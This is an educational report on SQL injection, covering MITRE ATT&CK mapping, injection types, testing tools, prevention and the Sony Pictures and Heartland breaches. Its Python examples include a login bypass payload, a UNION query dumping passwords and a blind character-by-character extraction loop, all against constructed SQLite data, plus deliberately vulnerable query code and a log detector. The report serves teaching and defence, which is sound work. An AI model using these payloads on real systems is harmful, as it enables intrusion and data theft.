Report of SQL

The document discusses SQL Injection (SQLi) as a significant web application vulnerability that allows attackers to manipulate database queries. It outlines the exploitation process, types of SQLi, detection methods, prevention techniques, and notable case studies such as the Sony Pictures and Heartland Payment Systems breaches. The report emphasizes the importance of security practices like input validation and the use of Web Application Firewalls to mitigate SQLi risks.

Raj Yadav

Abstract
SQL Injection (SQLi) is a code injection vulnerability
that allows attackers to manipulate queries an
application sends to its database. It is one of the most
common and dangerous vulnerabilities in web
applications. This report explores SQLi in the context of
MITRE ATT&CK Technique T1190 – Exploit Public-
Facing Application – to help understand, detect, and
mitigate such attacks.


Introduction
SQL Injection (SQLi) occurs when untrusted input is concatenated into an SQL statement and is therefore parsed as part of the query instead of being treated as data. It enables attackers to bypass authentication and to read, modify, or delete database contents, and in some database configurations to run commands on the database host. Historically, SQLi has been responsible for some of the largest data breaches, and it remains relevant today because SQL databases sit behind most web applications and string-built queries are still common.


MITRE ATT&CK Mapping

SQLi maps to MITRE ATT&CK Technique ID T1190 – Exploit Public-Facing Application, under the Initial Access tactic. The technique covers adversaries exploiting a weakness in an Internet-facing system (a website, API, or other exposed service) to gain a foothold. SQL Injection is one specific procedure under that technique.

In SQLi:
1. Public-Facing Entry Point – A website, API, or
application connected to a database is accessible from
the internet.
2. Vulnerability – Poor input validation or insecure SQL
query construction.
3. Exploitation – The attacker injects crafted SQL
commands into input fields.
4. Initial Access – Malicious queries execute on the
backend, allowing the attacker to bypass authentication,
extract/modify sensitive data, or pivot deeper into the
network.


This matches T1190’s definition because:


- The target is an internet-facing application.
- The method is exploiting a coding flaw.
- The outcome is initial access to systems and data.
Example Flow
1. Attacker finds a login form whose backend builds the query by concatenating the submitted fields into the SQL text.
2. Injection payload submitted in the username field:
' OR '1'='1' -- 
The closing quote and the space after -- matter: the comment swallows the rest of the original statement (including the password check), and MySQL only treats -- as a comment when whitespace follows it.
3. Backend executes the altered SQL; the WHERE clause has become username = '' OR '1'='1', which is true for every row.
4. The query returns a user row (usually the first account in the table) and the attacker is logged in without knowing any password, gaining access to protected data or an admin account.
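The flow above run end to end against a small SQLite database, as an added example that is not code from the original report. The users table, its two accounts and the demo() function are constructed for this illustration. login_vulnerable splices the form fields into the SQL text the way step 3 describes; login_safe sends the same fields as bound parameters, so the payload is compared as a literal username and matches nothing.

```python
import sqlite3


# Constructed demo table: the accounts below are invented for this example.
# Passwords are stored in plaintext only to keep the demo short; a real
# system stores a salted hash.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("admin", "s3cret!", "admin"), ("alice", "hunter2", "user")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Step 3 of the flow: form fields are spliced into the SQL text, so a
    quote in the input ends the string literal and the rest is parsed as SQL."""
    query = ("SELECT username, role FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    return conn.execute(query).fetchone()        # first matching row, or None


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Parameterized statement: the SQL text is fixed and the driver binds the
    values separately, so the input can only ever be compared as a string."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()


def demo() -> dict:
    """Run both implementations with a legitimate login and with the payload
    from step 2; returns the rows each one produced."""
    conn = make_db()
    payload = "' OR '1'='1' -- "                 # the payload from step 2
    # The vulnerable query becomes:
    #   ... WHERE username = '' OR '1'='1' -- ' AND password = 'anything'
    # Everything after -- is a comment and '1'='1' is always true, so the
    # first row in the table (admin) comes back.
    return {
        "legit_vuln": login_vulnerable(conn, "alice", "hunter2"),
        "bypass_vuln": login_vulnerable(conn, payload, "anything"),
        "legit_safe": login_safe(conn, "alice", "hunter2"),
        "bypass_safe": login_safe(conn, payload, "anything"),
    }


if __name__ == "__main__":
    for name, row in demo().items():
        print(f"{name:12s} -> {row}")
```

With the payload, the vulnerable path returns the admin row and the parameterized path returns None; both paths accept the genuine alice/hunter2 login, which is the point: the fix changes nothing for legitimate users.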


Types of SQL Injection


● Classic (in-band) SQLi: injection into form fields or URL parameters where the query result or the database error is returned directly in the response. Example: ' OR '1'='1
● Blind SQLi: nothing from the query is echoed back; information is inferred from the true/false behaviour of the page (boolean-based), one bit or one character per request.
● Time-Based Blind SQLi: a blind variant in which an injected delay (for example SLEEP() or BENCHMARK() in MySQL) makes the response time reveal whether a condition held.
● Union-Based SQLi: appends a UNION SELECT with a matching column count so that rows from other tables are returned inside the application's own result set.
● Error-Based SQLi: forces the database to place the data of interest inside an error message that the application displays.
● Out-of-Band SQLi: exfiltrates data over a separate channel, such as a DNS lookup or HTTP request that the database server itself is made to issue.
Example of how a payload alters a login query. The application builds:
SELECT * FROM users WHERE username = 'admin' AND password = '1234';
If the password field receives ' OR '1'='1 the statement actually executed is:
SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'='1';
AND binds tighter than OR, so the condition reads (username = 'admin' AND password = '') OR '1'='1', which is true for every row.
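To make the UNION-based and blind classes concrete, here is an added example that is not from the original report, run against a constructed SQLite schema. The vulnerable endpoint product_lookup interpolates a numeric id without quoting or validation (a hypothetical endpoint, not one the report describes). union_attack appends a second SELECT with the same column count to pull usernames and passwords into the product listing; blind_extract recovers a password one character at a time from nothing but "row shown / row not shown", which is the inference the Blind SQLi bullet describes. Time-based and out-of-band variants are not shown because SQLite has no sleep() or DNS functions.

```python
import sqlite3
import string


# Constructed demo schema: both tables and every row are invented for this example.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO products (name, price) VALUES ('widget', 9.99), ('gadget', 19.5);
        INSERT INTO users (username, password) VALUES ('admin', 's3cret!'), ('alice', 'hunter2');
    """)
    return conn


def product_lookup(conn: sqlite3.Connection, product_id: str) -> list:
    """Vulnerable endpoint (hypothetical): the id arrives as a string and is
    interpolated unquoted, so anything after the digits becomes SQL."""
    query = f"SELECT name, price FROM products WHERE id = {product_id}"
    return conn.execute(query).fetchall()


def union_attack(conn: sqlite3.Connection) -> list:
    """UNION-based SQLi: id 0 matches nothing, so the only rows returned are
    those of the appended SELECT, which must have the same column count (2)."""
    payload = "0 UNION SELECT username, password FROM users"
    return product_lookup(conn, payload)


def blind_extract(conn: sqlite3.Connection, target_user: str, column: str,
                  max_len: int = 32) -> str:
    """Boolean-based blind SQLi: no data is echoed, but the product row is
    present only when the injected AND condition is true. Comparing hex()
    output keeps quote characters out of the probe, so the charset can
    include punctuation without breaking the query (a common trick when
    quotes are filtered)."""
    charset = string.ascii_letters + string.digits + string.punctuation
    secret = f"(SELECT {column} FROM users WHERE username = '{target_user}')"
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            probe = (f"1 AND hex(substr({secret}, {pos}, 1)) = "
                     f"'{ch.encode().hex().upper()}'")
            if product_lookup(conn, probe):          # row present: guess was right
                recovered += ch
                break
        else:
            break                                    # nothing matched: end of string
    return recovered


if __name__ == "__main__":
    conn = make_db()
    print("normal   :", product_lookup(conn, "1"))
    print("union    :", union_attack(conn))
    print("blind    :", blind_extract(conn, "admin", "password"))
```

The blind loop costs at most len(charset) requests per character, which is why real tooling such as SQLMap uses binary search on the character code rather than a linear scan; the logic is the same.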


Testing Methods
Common tools and methods for detecting SQLi:
● SQLMap – automated detection and exploitation; it confirms the injection type (boolean, time-based, UNION, error-based, stacked) and can enumerate databases and tables.
● Burp Suite – intercepting proxy used to capture requests and resend them with modified parameters.
● Nmap + NSE scripts – service discovery, plus the http-sql-injection script for a first pass over crawled forms.
● Manual payloads – e.g. ' OR 1=1 -- , a lone single quote to provoke an error, or a delay probe; compare status code, response length, error text and timing against a clean request.
Prevention Techniques
● Parameterized queries / prepared statements – the primary fix: the SQL text is fixed and user data is bound separately, so it can never be parsed as code.
● ORMs (Object Relational Mappers) – safe when the ORM builds the statement; raw-query helpers in ORMs reintroduce the problem if they concatenate strings.
● Strict input validation (allowlisting) – reject unexpected characters, lengths and types; a defence-in-depth layer, not a substitute for parameterization.
● Least privilege – the application's database account should hold only the rights its queries need, which limits what a successful injection can read or change.
● Web Application Firewall (WAF) – filters known payload patterns; a compensating control that attackers routinely bypass with encoding and syntax variations, so it complements rather than replaces the fixes above.
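Detection on the defender's side, as an added example that is not from the original report: a scanner that parses Common Log Format web-server lines, URL-decodes each query parameter and flags the indicators behind the manual payloads listed above (tautologies, comment truncation, UNION SELECT, sleep/benchmark calls). The log lines, addresses and paths are constructed for this illustration; the signatures are deliberately narrow and would need tuning for real traffic, and the last sample line carries a benign apostrophe that must not fire.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access log (Common Log Format); addresses, paths and
# payloads are invented for this example. The last line is a benign
# apostrophe that a detector must not flag.
SAMPLE_LOG = """\
203.0.113.7 - - [12/May/2024:10:01:02 +0000] "GET /login?user=alice&pw=hunter2 HTTP/1.1" 200 512
203.0.113.7 - - [12/May/2024:10:01:09 +0000] "GET /login?user=%27%20OR%20%271%27%3D%271%27%20--%20&pw=x HTTP/1.1" 302 0
198.51.100.4 - - [12/May/2024:10:02:15 +0000] "GET /product?id=0%20UNION%20SELECT%20username,password%20FROM%20users HTTP/1.1" 200 2048
198.51.100.4 - - [12/May/2024:10:02:31 +0000] "GET /product?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 1800
192.0.2.9 - - [12/May/2024:10:03:00 +0000] "GET /search?q=o%27reilly HTTP/1.1" 200 900
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# One indicator per SQLi class discussed above. Kept deliberately narrow;
# a real deployment tunes these against its own traffic.
SIGNATURES = [
    ("tautology", re.compile(r'''\bor\b\s*["']?\w+["']?\s*=\s*["']?\w+''', re.I)),
    ("comment",   re.compile(r"--\s|/\*")),
    ("union",     re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I)),
    ("time",      re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor\s+delay)\b", re.I)),
]


def indicators(value: str) -> list:
    """Labels of every signature that fires on one decoded parameter value."""
    return [label for label, rx in SIGNATURES if rx.search(value)]


def scan_log(text: str) -> list:
    """Parse each request line, decode its query string once (parse_qsl
    handles %XX and '+'), and report (ip, path, parameter, labels) for every
    parameter that carries at least one indicator. A production detector
    would also try a second decoding pass to catch double-encoded payloads."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                                  # not a request line
        parts = urlsplit(m.group("target"))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            hits = indicators(value)
            if hits:
                findings.append((m.group("ip"), parts.path, name, hits))
    return findings


if __name__ == "__main__":
    for ip, path, param, hits in scan_log(SAMPLE_LOG):
        print(f"{ip:14s} {path:10s} param={param:6s} {','.join(hits)}")
```

Matching on decoded parameter values rather than on the raw request line is what lets the o'reilly query pass while the percent-encoded tautology is caught; it is also the first thing a WAF does, and the reason encoding tricks target that decoding step.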


Case Studies

Sony Pictures Hack (2011)

In June 2011, Sony Pictures Entertainment suffered a large breach in which the attackers used SQL Injection against its websites to reach backend databases. It was one of a string of breaches against Sony entities that year, following the PlayStation Network compromise in April. The hacking group LulzSec claimed the attack and stated that a single injection point had given it access.
Attack Method:
● The attackers targeted poorly secured web
applications belonging to Sony Pictures.
● By inserting malicious SQL queries into vulnerable
input fields, they were able to bypass
authentication and directly access backend
databases.
● Vulnerable pages lacked input sanitization and
prepared statements, making exploitation trivial.

Impact:
● Stolen personal data of approximately 1 million users, including names, passwords, email addresses, home addresses, dates of birth, and other profile data.


● Passwords were stored in plaintext, further
amplifying the security failure.
● Sensitive data was leaked publicly on file-sharing
sites.

Key Findings:
● No encryption or hashing for stored passwords.
● Lack of basic security practices like parameterized
queries.
● Absence of a Web Application Firewall (WAF) to
filter SQL injection payloads.
● Public backlash and major brand damage,
alongside lawsuits and investigations.

Lessons Learned:
● Even large corporations can fall victim to simple,
well-known vulnerabilities when security hygiene
is poor.
● Security fundamentals—such as hashing
passwords, validating inputs, and patching systems
—are critical for preventing such breaches.


Heartland Payment Systems Breach (2008)

In 2008, Heartland Payment Systems, a major US-based payment processor, suffered one of the largest data breaches in history. The breach was discovered in January 2009, but it had been ongoing for months. The attack involved SQL Injection as one of the key methods of compromise, alongside network-level malware deployment.
Attack Method:
● Attackers exploited a SQL Injection vulnerability in a web application on Heartland's public-facing corporate website to gain an initial foothold, then spent months working from that network toward the card processing systems.


● This access allowed them to install custom sniffer malware on Heartland's internal network.
● The malware intercepted credit card data in transit, capturing magnetic stripe information before encryption.

Impact:
● Over 130 million credit and debit card numbers
were stolen.
● Massive financial fraud ensued, with millions of
dollars in fraudulent transactions worldwide.
● Heartland faced lawsuits, regulatory fines, and had
to pay more than $140 million in settlements to
banks and credit card companies.
● Their PCI DSS (Payment Card Industry Data
Security Standard) compliance certification was
revoked until they passed a full re-audit.

Key Findings:
● SQL Injection opened the door for deeper
compromise.


● The breach went undetected for months due to insufficient monitoring.
● Network segmentation between public-facing and internal systems was either weak or absent.

Lessons Learned:
● Payment processors must implement multi-
layered defenses — WAFs, input validation,
database hardening, and strict network
segmentation.
● Continuous monitoring and anomaly detection can
identify malicious activity early.
● Compliance checklists alone don’t guarantee
security — real-world resilience requires active
threat detection and patch management.


Diagram: SQL Injection Process

The diagram (not reproduced here) illustrates the flow of a SQL Injection attack. It begins with user input, such as from a login form, which is processed by the application without proper validation. Malicious SQL code is inserted into the query and executed by the database, potentially leading to the exposure, modification, or deletion of sensitive data.


Screenshot: SQLMap Testing

The screenshot (not reproduced here) shows an example run of SQLMap, an automated SQL Injection testing tool. In this simulated case, SQLMap detects a UNION-based SQL injection vulnerability in the 'user' parameter and successfully retrieves the names of the databases from the target server.
